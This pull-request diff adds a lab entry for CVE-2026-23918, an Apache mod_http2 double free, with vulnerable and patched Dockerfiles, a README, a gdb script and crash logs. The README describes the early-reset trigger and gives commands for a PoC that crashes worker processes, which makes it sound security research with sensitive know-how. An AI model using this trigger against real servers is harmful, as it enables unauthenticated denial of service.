### PR TITLE
Add CVE-2026-23918: Apache mod_http2 HTTP/2 early-reset double free

### DIFF
--- a/CVE-2026-23918/Dockerfile.patched
+++ b/CVE-2026-23918/Dockerfile.patched
@@ -1,0 +1,10 @@
+# syntax=docker/dockerfile:1
+#
+# CVE-2026-23918 — patched control target.
+# Apache HTTP Server 2.4.67 ships mod_http2 v2.0.37 (httpd r1930444):
+# add_for_purge() deduplicates m->spurge and each stream pool gets its own
+# APR allocator again. Identical configuration to the vulnerable target.
+FROM httpd:2.4.67
+
+# Enable mod_http2 and cleartext HTTP/2 (h2c) so the lab needs no TLS assets.
+RUN printf '\n# CVE-2026-23918 lab: enable mod_http2 with h2c\nLoadModule http2_module modules/mod_http2.so\nProtocols h2c http/1.1\n' >> /usr/local/apache2/conf/httpd.conf

--- a/CVE-2026-23918/Dockerfile.vulnerable
+++ b/CVE-2026-23918/Dockerfile.vulnerable
@@ -1,0 +1,12 @@
+# syntax=docker/dockerfile:1
+#
+# CVE-2026-23918 — vulnerable target.
+# Apache HTTP Server 2.4.66 ships mod_http2 v2.0.36, which reverted the
+# per-stream memory allocator and left three unguarded APR_ARRAY_PUSH sites
+# feeding m->spurge in modules/http2/h2_mplx.c. The default mpm_event
+# (threaded) in this image satisfies the MPM precondition.
+FROM httpd:2.4.66
+
+# Enable mod_http2 and cleartext HTTP/2 (h2c) so the lab needs no TLS assets.
+# To watch the double purge itself, also add:  LogLevel warn http2:trace2
+RUN printf '\n# CVE-2026-23918 lab: enable mod_http2 with h2c\nLoadModule http2_module modules/mod_http2.so\nProtocols h2c http/1.1\n' >> /usr/local/apache2/conf/httpd.conf

--- a/CVE-2026-23918/README.md
+++ b/CVE-2026-23918/README.md
@@ -1,0 +1,107 @@
+# CVE-2026-23918: Apache HTTP Server mod_http2 HTTP/2 Early-Reset Double Free
+
+> **Exploit Intelligence Platform** | [exploit-intel.com](https://exploit-intel.com)
+
+## Metadata
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-23918 |
+| Component | `mod_http2` (mod_h2 v2.0.36) in Apache HTTP Server 2.4.66 — duplicate purge of an `h2_stream` in `modules/http2/h2_mplx.c` (`m_stream_cleanup()` push sites, consumed by `c1_purge_streams()`) |
+| Class | Double Free / Use-After-Free (CWE-415 / CWE-1341) — pre-authentication remote memory corruption |
+| CVSS | 8.8 (High) per vendor and public advisories |
+| Affected | Apache HTTP Server **2.4.66 only**, with HTTP/2 enabled and a threaded MPM (`event`/`worker`). MPM `prefork` is NOT affected. Debian/Ubuntu backported the fix into their 2.4.66 packages on 2026-01-23 — disto version strings alone can mislead. |
+| Fixed | Apache HTTP Server 2.4.67 (mod_h2 v2.0.37, httpd r1930444) |
+| Authentication | None. One HTTP/2 connection, two frames. |
+| Lab Targets | `httpd:2.4.66` and `httpd:2.4.67` official images, `mpm_event` + h2c |
+
+## Verdict
+
+`[SUCCESS]` — pre-authentication remote double free confirmed end-to-end at source, log, and instruction level.
+
+The PoC sends, on one cleartext HTTP/2 connection, `HEADERS` immediately followed by `RST_STREAM` with a non-zero error code on the same stream — an "early reset" that reaches the multiplexer before it has registered the stream. Against **2.4.66**:
+
+- `http2:trace2` logs show every stream pushed to the `spurge` cleanup array **twice** (24 `move to spurge` lines for 12 streams);
+- a 60-connection run produced **60 child-process `SIGSEGV`s** (`AH00052 ... exit signal Segmentation fault (11)` plus `AH10392: children are killed successively!`);
+- a gdb capture shows the crash inside `c1_purge_streams()` at `h2_mplx.c:606`, dereferencing the duplicate `spurge` entry after the first `h2_stream_destroy()` already freed it;
+- a breakpoint capture at the same line shows the same `h2_stream*` valid on purge iteration 0 and **unmapped** on iteration 1.
+
+Against **2.4.67**, identically configured: the `add_for_purge()` dedup guard logs each stream once (12 lines / 12 streams) and zero crashes occur. See [poc_verification_report.md](poc_verification_report.md).
+
+**Observed impact**: reliable unauthenticated crash of worker child processes (trivial DoS; ~1 dead child per trigger connection). RCE was **not** attempted — this entry proves the memory-corruption primitive and documents the publicly described escalation path; see [vulnerability_analysis.md](vulnerability_analysis.md) §6 for an evidence-weighted exploitability assessment.
+
+## Lab Architecture
+
+Two single-service containers built from the official Apache images; no internet contact at PoC time beyond the initial image pull.
+
+- **`vulnerable`** — `httpd:2.4.66` with `mod_http2` loaded and `Protocols h2c http/1.1`, host port `8080`. The image's default `mpm_event` satisfies the threaded-MPM precondition, and its APR mmap allocator is the configuration public reporting identifies as enabling the RCE path.
+- **`patched`** — `httpd:2.4.67`, byte-identical configuration, host port `8081`. Control target: proves the trigger is specifically neutralized by the v2.0.37 fix.
+
+Cleartext h2c (prior-knowledge) is used so the lab needs no TLS assets; the primitive is identical over TLS+ALPN (`poc/poc.py` auto-detects `https://` targets).
+
+## Quick Start
+
+```bash
+cd CVE-2026-23918
+
+# 1. Build and start both targets (images are thin layers over cached
+#    httpd bases; first build ~1 min including pulls).
+docker compose up -d --build
+
+# 2. Wait for healthchecks.
+docker compose ps                          # both services (healthy)
+
+# 3. Control first: well-formed traffic is safe on BOTH targets.
+python3 poc/control_test.py http://127.0.0.1:8080
+python3 poc/control_test.py http://127.0.0.1:8081
+
+# 4. Trigger the primitive against the vulnerable target.
+#    THIS KILLS WORKER CHILD PROCESSES BY DESIGN — lab use only.
+python3 poc/poc.py http://127.0.0.1:8080 --i-am-authorized
+
+# 5. Confirm on the server side (ground truth).
+docker compose logs vulnerable 2>&1 | grep -E 'exit signal|double free'
+docker compose logs vulnerable 2>&1 | grep -c 'move to spurge'   # needs LogLevel http2:trace2
+
+# 6. Same trigger against the patched target: no crashes.
+python3 poc/poc.py http://127.0.0.1:8081 --i-am-authorized
+docker compose logs patched 2>&1 | grep -cE 'exit signal|double free'   # 0
+
+# 7. Tear it down.
+docker compose down -v
+```
+
+Note on signals: the trigger connection closing is normal on **both** builds — external behavior alone is not proof. Ground truth is server-side: crash lines in the error log, or the doubled `move to spurge` trace with `LogLevel warn http2:trace2` added to the Apache config. A non-crash is also not proof of safety (silent corruption case) — version facts decide exposure; see the analysis.
+
+## Files
+
+| Path | Purpose |
+|---|---|
+| `README.md` | This file — entry summary, lab architecture, quick start |
+| `intel_brief.md` | CVE intelligence: vendor, versions, timeline, credits, references |
+| `vulnerability_analysis.md` | Root cause trace through `h2_mplx.c`, fix analysis, primitive layering, exploitability assessment |
+| `poc_verification_report.md` | Verification methodology and results: vulnerable vs patched, log/trace/gdb evidence |
+| `lab_build_report.md` | Lab build details: images, config deltas, ports, healthchecks, optional trace/gdb setup |
+| `Dockerfile.vulnerable` | `httpd:2.4.66` + mod_http2/h2c enablement |
+| `Dockerfile.patched` | `httpd:2.4.67`, identical config (control) |
+| `docker-compose.yml` | Two-target lab definition (ports 8080/8081) |
+| `poc/poc.py` | Standalone trigger + crash detector. Python 3 stdlib only. CLI: `python3 poc/poc.py <target> --i-am-authorized [--iterations N] [--pairs N]` |
+| `poc/control_test.py` | Control: well-formed h2 GETs + late RST are served cleanly on both targets |
+| `artifacts/mod_h2-v2.0.36...v2.0.37.diff` | The upstream fix diff this analysis is anchored to |
+| `artifacts/gdb-crash-capture.txt` | SIGSEGV backtrace, registers, faulting instruction (`c1_purge_streams+108`) |
+| `artifacts/gdb-purge-dump.txt` | Breakpoint capture: live `h2_stream` on iteration 0, unmapped on iteration 1 |
+| `artifacts/capture.gdb` | gdb batch script used for the purge-loop capture |
+| `artifacts/trace-vulnerable-double-spurge.txt` | trace2 evidence of the double push (2.4.66) |
+| `artifacts/trace-patched-single-spurge.txt` | trace2 evidence of the dedup guard (2.4.67) |
+
+## References
+
+- [Apache HTTP Server 2.4 vulnerabilities](https://httpd.apache.org/security/vulnerabilities_24.html) — vendor advisory entry
+- [NVD — CVE-2026-23918](https://nvd.nist.gov/vuln/detail/CVE-2026-23918)
+- [Red Hat CVE-2026-23918](https://access.redhat.com/security/cve/cve-2026-23918)
+- [mod_h2 v2.0.37 release](https://github.com/icing/mod_h2/releases/tag/v2.0.37) — "Prevent double purge of a stream, resulting in a double free"
+- [ASF Bugzilla #69899](https://bz.apache.org/bugzilla/show_bug.cgi?id=69899)
+- [Stefan Eissing — "That 'responsible disclosure' Thing"](https://eissing.org/icing/posts/responsible-disclosure/) — the mod_h2 maintainer's account of the embargo, including the independently developed RCE
+- [alt3kx/CVE-2026-23918](https://github.com/alt3kx/CVE-2026-23918) — public detector PoC (h2ghost)
+- [The Hacker News — Critical Apache HTTP/2 Flaw](https://thehackernews.com/2026/05/critical-apache-http2-flaw.html)
+- CWE-415: [Double Free](https://cwe.mitre.org/data/definitions/415.html)

--- a/CVE-2026-23918/artifacts/capture.gdb
+++ b/CVE-2026-23918/artifacts/capture.gdb
@@ -1,0 +1,19 @@
+set pagination off
+set breakpoint pending on
+set print pretty on
+handle SIGPIPE nostop noprint pass
+break h2_mplx.c:606
+commands
+  silent
+  printf "\n===== PURGE HIT =====\n"
+  printf "loop i = %d of spurge->nelts = %d\n", i, m->spurge->nelts
+  printf "stream = %p  (same pointer on consecutive hits = duplicate spurge entry)\n", stream
+  print *stream
+  x/12gx stream
+  continue
+end
+run
+printf "\n===== INFERIOR STOPPED =====\n"
+bt 10
+x/4i $pc
+quit

--- a/CVE-2026-23918/artifacts/control-patched.txt
+++ b/CVE-2026-23918/artifacts/control-patched.txt
@@ -1,0 +1,2 @@
+[*] 25/25 well-formed rounds served (2 GETs + late RST each); post-run health probe: OK
+[CONTROL PASS] Normal HTTP/2 traffic, including late RST_STREAM, is served and leaves the server healthy. The crash produced by poc.py is specific to the early-reset double purge, not to HTTP/2 or resets in general.

--- a/CVE-2026-23918/artifacts/control-vulnerable.txt
+++ b/CVE-2026-23918/artifacts/control-vulnerable.txt
@@ -1,0 +1,2 @@
+[*] 25/25 well-formed rounds served (2 GETs + late RST each); post-run health probe: OK
+[CONTROL PASS] Normal HTTP/2 traffic, including late RST_STREAM, is served and leaves the server healthy. The crash produced by poc.py is specific to the early-reset double purge, not to HTTP/2 or resets in general.

--- a/CVE-2026-23918/artifacts/gdb-crash-capture.txt
+++ b/CVE-2026-23918/artifacts/gdb-crash-capture.txt
@@ -1,0 +1,505 @@
+warning: Error disabling address space randomization: Operation not permitted
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/aarch64-linux-gnu/libthread_db.so.1".
+AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.4. Set the 'ServerName' directive globally to suppress this message
+[New Thread 0xffffbb12a120 (LWP 551)]
+[New Thread 0xffffba91a120 (LWP 552)]
+[New Thread 0xffffba10a120 (LWP 553)]
+[New Thread 0xffffb98fa120 (LWP 554)]
+[New Thread 0xffffb90ea120 (LWP 555)]
+[New Thread 0xffffb88da120 (LWP 556)]
+[New Thread 0xffffb80ca120 (LWP 557)]
+[New Thread 0xffffb78ba120 (LWP 558)]
+[New Thread 0xffffb70aa120 (LWP 559)]
+[New Thread 0xffffb689a120 (LWP 560)]
+[New Thread 0xffffb608a120 (LWP 561)]
+[New Thread 0xffffb587a120 (LWP 562)]
+[New Thread 0xffffb506a120 (LWP 563)]
+[New Thread 0xffffb485a120 (LWP 564)]
+[New Thread 0xffffb404a120 (LWP 565)]
+[New Thread 0xffffb383a120 (LWP 566)]
+[New Thread 0xffffb302a120 (LWP 567)]
+[New Thread 0xffffb281a120 (LWP 568)]
+[New Thread 0xffffb200a120 (LWP 569)]
+[New Thread 0xffffb17fa120 (LWP 570)]
+[New Thread 0xffffb0fea120 (LWP 571)]
+[New Thread 0xffffb07da120 (LWP 572)]
+[New Thread 0xffffaffca120 (LWP 573)]
+[New Thread 0xffffaf7ba120 (LWP 574)]
+[New Thread 0xffffaefaa120 (LWP 575)]
+[New Thread 0xffffae79a120 (LWP 576)]
+[New Thread 0xffffadf8a120 (LWP 577)]
+[New Thread 0xffffad77a120 (LWP 578)]
+[New Thread 0xffffacf6a120 (LWP 579)]
+[New Thread 0xffff9ffff120 (LWP 580)]
+[New Thread 0xffff9f7ef120 (LWP 581)]
+[New Thread 0xffff9efdf120 (LWP 582)]
+[New Thread 0xffff9e7cf120 (LWP 583)]
+[New Thread 0xffff9dfbf120 (LWP 584)]
+[New Thread 0xffff9d7af120 (LWP 585)]
+[New Thread 0xffff9cf9f120 (LWP 586)]
+[New Thread 0xffff7bfff120 (LWP 587)]
+[New Thread 0xffff735ff120 (LWP 588)]
+[New Thread 0xffff7b7ef120 (LWP 589)]
+[New Thread 0xffff7afdf120 (LWP 590)]
+[New Thread 0xffff7a7cf120 (LWP 591)]
+[New Thread 0xffff79fbf120 (LWP 592)]
+[New Thread 0xffff797af120 (LWP 593)]
+[New Thread 0xffff78f9f120 (LWP 594)]
+[New Thread 0xffff73fff120 (LWP 595)]
+[New Thread 0xffff72def120 (LWP 596)]
+[New Thread 0xffff725df120 (LWP 597)]
+[New Thread 0xffff71dcf120 (LWP 598)]
+[New Thread 0xffff715bf120 (LWP 599)]
+[New Thread 0xffff70daf120 (LWP 600)]
+[New Thread 0xffff3bfff120 (LWP 601)]
+[New Thread 0xffff3b7ef120 (LWP 602)]
+Error while mapping shared library sections:
+/proc/549/ns/mnt: Permission denied.
+[Thread 0xffffae79a120 (LWP 576) exited]
+
+Thread 37 "httpd" received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xffff9cf9f120 (LWP 586)]
+c1_purge_streams (m=0xffffbbbba738) at ./modules/http2/h2_mplx.c:606
+warning: 606	./modules/http2/h2_mplx.c: No such file or directory
+=== BACKTRACE ===
+#0  c1_purge_streams (m=0xffffbbbba738) at ./modules/http2/h2_mplx.c:606
+#1  0x0000ffffbb19a220 [PAC] in h2_mplx_c1_poll (m=0xffffbbbba738, timeout=timeout@entry=0, on_stream_input=on_stream_input@entry=0xffffbb19f168 <on_stream_input>, on_stream_output=on_stream_output@entry=0xffffbb19eff0 <on_stream_output>, on_ctx=on_ctx@entry=0xffffbbbba0a0) at ./modules/http2/h2_mplx.c:659
+#2  0x0000ffffbb1a2e2c [PAC] in h2_session_process (session=0xffffbbbba0a0, async=1, pkeepalive=pkeepalive@entry=0xffff9cf9e6c4) at ./modules/http2/h2_session.c:2013
+#3  0x0000ffffbb18ce5c [PAC] in h2_c1_run (c=0xffffbbbe2360) at ./modules/http2/h2_c1.c:132
+#4  0x0000aaaac38e6634 [PAC] in ap_run_process_connection (c=c@entry=0xffffbbbe2360) at ./server/connection.c:42
+#5  0x0000ffffbbd7b1b4 [PAC] in process_socket (thd=0xffffbbca3490, p=<optimized out>, sock=<optimized out>, cs=<optimized out>, my_child_num=<optimized out>, my_thread_num=<optimized out>) at ./server/mpm/event/event.c:1098
+#6  0x0000ffffbbd7bf28 [PAC] in worker_thread (thd=0xffffbbca3490, dummy=<optimized out>) at ./server/mpm/event/event.c:2252
+#7  0x0000ffffbbf25f38 [PAC] in ?? () from /lib/aarch64-linux-gnu/libc.so.6
+#8  0x0000ffffbbf8dc2c [PAC] in ?? () from /lib/aarch64-linux-gnu/libc.so.6
+=== REGISTERS ===
+x0             0xffffbbbb8330      281473831371568
+x1             0x4                 4
+x2             0xffff80006         68718952454
+x3             0x7                 7
+x4             0x2                 2
+x5             0xffff80006498      281472829252760
+x6             0x0                 0
+x7             0x200               512
+x8             0xd7                215
+x9             0xffffbc0ffb48      281473836907336
+x10            0xffffbc0ffb10      281473836907280
+x11            0xaaaac392fae0      187650402351840
+x12            0xffffbc0b5be0      281473836604384
+x13            0x0                 0
+x14            0x0                 0
+x15            0x0                 0
+x16            0xffffbc0b0820      281473836582944
+x17            0xffffbbf37e20      281473835040288
+x18            0xa1160000          2702573568
+x19            0xffffbbb8a0a0      281473831182496
+x20            0x1                 1
+x21            0xffffbbbba738      281473831380792
+x22            0xffffbbbba0a0      281473831379104
+x23            0xffffbb1d0898      281473820985496
+x24            0x7fffffff          2147483647
+x25            0x0                 0
+x26            0x225               549
+x27            0xffffbbbe2360      281473831543648
+x28            0xffffbbbba0a0      281473831379104
+x29            0xffff9cf9e460      281473315365984
+x30            0xffffbb199050      281473820758096
+sp             0xffff9cf9e460      0xffff9cf9e460
+pc             0xffffbb19906c      0xffffbb19906c <c1_purge_streams+108>
+cpsr           0x20000000          [ EL=0 BTYPE=0 C ]
+fpsr           0x0                 [ ]
+fpcr           0x0                 [ Len=0 Stride=0 RMode=0 ]
+tpidr          0xffff9cf9f840      0xffff9cf9f840
+tpidr2         0x0                 0x0
+pauth_dmask    0x7f000000000000    35747322042253312
+pauth_cmask    0x7f000000000000    35747322042253312
+=== FAULTING INSN ===
+=> 0xffffbb19906c <c1_purge_streams+108>:	ldr	w0, [x19, #24]
+   0xffffbb199070 <c1_purge_streams+112>:	cmp	w0, #0x7
+   0xffffbb199074 <c1_purge_streams+116>:	b.ne	0xffffbb199118 <c1_purge_streams+280>  // b.any
+   0xffffbb199078 <c1_purge_streams+120>:	ldr	x0, [x19, #80]
+   0xffffbb19907c <c1_purge_streams+124>:	cbz	x0, 0xffffbb19908c <c1_purge_streams+140>
+   0xffffbb199080 <c1_purge_streams+128>:	ldr	x1, [x21, #8]
+   0xffffbb199084 <c1_purge_streams+132>:	bl	0xffffbb18a1a0 <h2_beam_destroy>
+   0xffffbb199088 <c1_purge_streams+136>:	str	xzr, [x19, #80]
+06): [client 192.168.65.1:35577] bb_dump(1): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:21:23.405730 2026] [http2:debug] [pid 549:tid 578] h2_session.c(383): [client 192.168.65.1:35577] AH03066: h2_session(549-0,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.405732 2026] [http2:trace2] [pid 549:tid 578] h2_session.c(464): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.405735 2026] [http2:debug] [pid 549:tid 578] h2_session.c(383): [client 192.168.65.1:35577] AH03066: h2_session(549-0,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.405736 2026] [http2:trace2] [pid 549:tid 578] h2_session.c(473): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:21:23.405738 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(556): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.405740 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(366): [client 192.168.65.1:35577] h2_c1_io(1): adding 9 data bytes
+[Thu Aug 06 15:21:23.405741 2026] [http2:debug] [pid 549:tid 578] h2_session.c(635): [client 192.168.65.1:35577] AH03068: h2_session(549-0,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:21:23.405743 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(366): [client 192.168.65.1:35577] h2_c1_io(1): adding 17 data bytes
+[Thu Aug 06 15:21:23.405744 2026] [http2:debug] [pid 549:tid 578] h2_session.c(635): [client 192.168.65.1:35577] AH03068: h2_session(549-0,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:21:23.405746 2026] [http2:trace2] [pid 549:tid 578] h2_session.c(1369): [client 192.168.65.1:35577] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.405750 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(131): [client 192.168.65.1:35577] h2_session(1)-out: heap[26] 
+[Thu Aug 06 15:21:23.405752 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(131): [client 192.168.65.1:35577] h2_session(1)-out: flush 
+[Thu Aug 06 15:21:23.405764 2026] [http2:trace2] [pid 549:tid 578] h2_mplx.c(1206): [client 192.168.65.1:35577] h2_mplx(549-0): enter polling timeout=0
+[Thu Aug 06 15:21:23.405766 2026] [http2:trace2] [pid 549:tid 578] h2_mplx.c(1250): [client 192.168.65.1:35577] h2_mplx(549-0): polling timed out 
+[Thu Aug 06 15:21:23.405768 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(524): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.405770 2026] [http2:debug] [pid 549:tid 578] h2_session.c(1459): [client 192.168.65.1:35577] AH03078: h2_session(549-0,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:21:23.405772 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.405779 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(524): [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.405781 2026] [http2:trace2] [pid 549:tid 578] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.405783 2026] [http2:debug] [pid 549:tid 578] h2_session.c(1971): [client 192.168.65.1:35577] AH10306: h2_session(549-0,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:21:23.405990 2026] [http2:trace1] [pid 549:tid 579] h2_c1.c(246): [client 192.168.65.1:35577] h2_h2, process_conn
+[Thu Aug 06 15:21:23.406013 2026] [http2:trace1] [pid 549:tid 579] h2_c1.c(297): [client 192.168.65.1:35577] process_conn
+[Thu Aug 06 15:21:23.406015 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(524): [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.406024 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(506): [client 192.168.65.1:35577] bb_dump(2): c1 in(HEAP[9])
+[Thu Aug 06 15:21:23.406030 2026] [http2:debug] [pid 549:tid 579] h2_session.c(383): [client 192.168.65.1:35577] AH03066: h2_session(549-0,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.406032 2026] [http2:trace2] [pid 549:tid 579] h2_session.c(464): [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.406034 2026] [http2:trace2] [pid 549:tid 579] h2_session.c(489): [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:21:23.406036 2026] [http2:debug] [pid 549:tid 579] h2_session.c(1459): [client 192.168.65.1:35577] AH03078: h2_session(549-0,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:21:23.406037 2026] [http2:trace1] [pid 549:tid 579] h2_session.c(1474): [client 192.168.65.1:35577] h2_session(549-0,IDLE,0): enter idle
+[Thu Aug 06 15:21:23.406039 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(556): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.406040 2026] [http2:trace2] [pid 549:tid 579] h2_mplx.c(1206): [client 192.168.65.1:35577] h2_mplx(549-0): enter polling timeout=0
+[Thu Aug 06 15:21:23.406043 2026] [http2:trace2] [pid 549:tid 579] h2_session.c(1406): [client 192.168.65.1:35577] h2_stream(549-0-0,IDLE): on_input change
+[Thu Aug 06 15:21:23.406046 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(524): [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.406048 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:35577] h2_session(549-0,BUSY,0): input gone
+[Thu Aug 06 15:21:23.406050 2026] [http2:debug] [pid 549:tid 579] h2_session.c(1569): [client 192.168.65.1:35577] AH03401: h2_session(549-0,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:21:23.406058 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(366): [client 192.168.65.1:35577] h2_c1_io(2): adding 17 data bytes
+[Thu Aug 06 15:21:23.406060 2026] [http2:debug] [pid 549:tid 579] h2_session.c(635): [client 192.168.65.1:35577] AH03068: h2_session(549-0,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:21:23.406066 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(131): [client 192.168.65.1:35577] h2_session(2)-out: heap[17] flush 
+[Thu Aug 06 15:21:23.406096 2026] [http2:debug] [pid 549:tid 579] h2_session.c(848): [client 192.168.65.1:35577] AH03069: h2_session(549-0,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:21:23.406100 2026] [http2:debug] [pid 549:tid 579] h2_session.c(1459): [client 192.168.65.1:35577] AH03078: h2_session(549-0,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:21:23.406101 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:35577] h2_session(549-0,DONE,0): session_read done
+[Thu Aug 06 15:21:23.406103 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(524): [client 192.168.65.1:35577] h2_session(549-0,DONE,0): session_read start
+[Thu Aug 06 15:21:23.406104 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:35577] h2_session(549-0,DONE,0): input gone
+[Thu Aug 06 15:21:23.406106 2026] [http2:trace2] [pid 549:tid 579] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:35577] h2_session(549-0,DONE,0): session_read done
+[Thu Aug 06 15:21:23.406108 2026] [http2:debug] [pid 549:tid 579] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:35577] AH03045: h2_session(549-0,DONE,0): process, closing conn
+[Thu Aug 06 15:21:23.406112 2026] [http2:trace1] [pid 549:tid 579] h2_session.c(2133): [client 192.168.65.1:35577] h2_session(549-0,DONE,0): pre_close
+[Thu Aug 06 15:21:23.406115 2026] [http2:trace1] [pid 549:tid 579] h2_session.c(859): [client 192.168.65.1:35577] h2_session(549-0,DONE,0): pool_cleanup
+[Thu Aug 06 15:21:23.406117 2026] [http2:debug] [pid 549:tid 579] h2_session.c(1459): [client 192.168.65.1:35577] AH03078: h2_session(549-0,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:21:23.406118 2026] [http2:trace2] [pid 549:tid 579] h2_mplx.c(502): [client 192.168.65.1:35577] h2_mplx(549-0): start release
+[Thu Aug 06 15:21:23.406120 2026] [http2:trace1] [pid 549:tid 579] h2_mplx.c(518): [client 192.168.65.1:35577] h2_mplx(549-0): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:21:23.406122 2026] [http2:trace1] [pid 549:tid 579] h2_mplx.c(570): [client 192.168.65.1:35577] h2_mplx(549-0): released
+[Thu Aug 06 15:21:23.406584 2026] [http2:trace1] [pid 549:tid 580] h2_c1.c(246): [client 192.168.65.1:26313] h2_h2, process_conn
+[Thu Aug 06 15:21:23.406618 2026] [http2:trace1] [pid 549:tid 580] h2_c1.c(251): [client 192.168.65.1:26313] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:21:23.406627 2026] [http2:trace1] [pid 549:tid 580] h2_c1.c(281): [client 192.168.65.1:26313] h2_h2, direct mode detected
+[Thu Aug 06 15:21:23.406631 2026] [http2:trace1] [pid 549:tid 580] h2_c1.c(297): [client 192.168.65.1:26313] process_conn
+[Thu Aug 06 15:21:23.406634 2026] [http2:debug] [pid 549:tid 580] h2_stream.c(609): [client 192.168.65.1:26313] AH03082: h2_stream(549-1-0,IDLE): created
+[Thu Aug 06 15:21:23.406692 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1070): [client 192.168.65.1:26313] AH03200: h2_session(549-1,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:21:23.406696 2026] [http2:trace1] [pid 549:tid 580] h2_c1.c(300): [client 192.168.65.1:26313] conn_setup
+[Thu Aug 06 15:21:23.406700 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1170): [client 192.168.65.1:26313] AH03201: h2_session(549-1,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:21:23.406711 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1876): [client 192.168.65.1:26313] AH03079: h2_session(549-1,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:21:23.406713 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1459): [client 192.168.65.1:26313] AH03078: h2_session(549-1,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:21:23.406716 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(366): [client 192.168.65.1:26313] h2_c1_io(3): adding 15 data bytes
+[Thu Aug 06 15:21:23.406719 2026] [http2:debug] [pid 549:tid 580] h2_session.c(635): [client 192.168.65.1:26313] AH03068: h2_session(549-1,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:21:23.406721 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(366): [client 192.168.65.1:26313] h2_c1_io(3): adding 13 data bytes
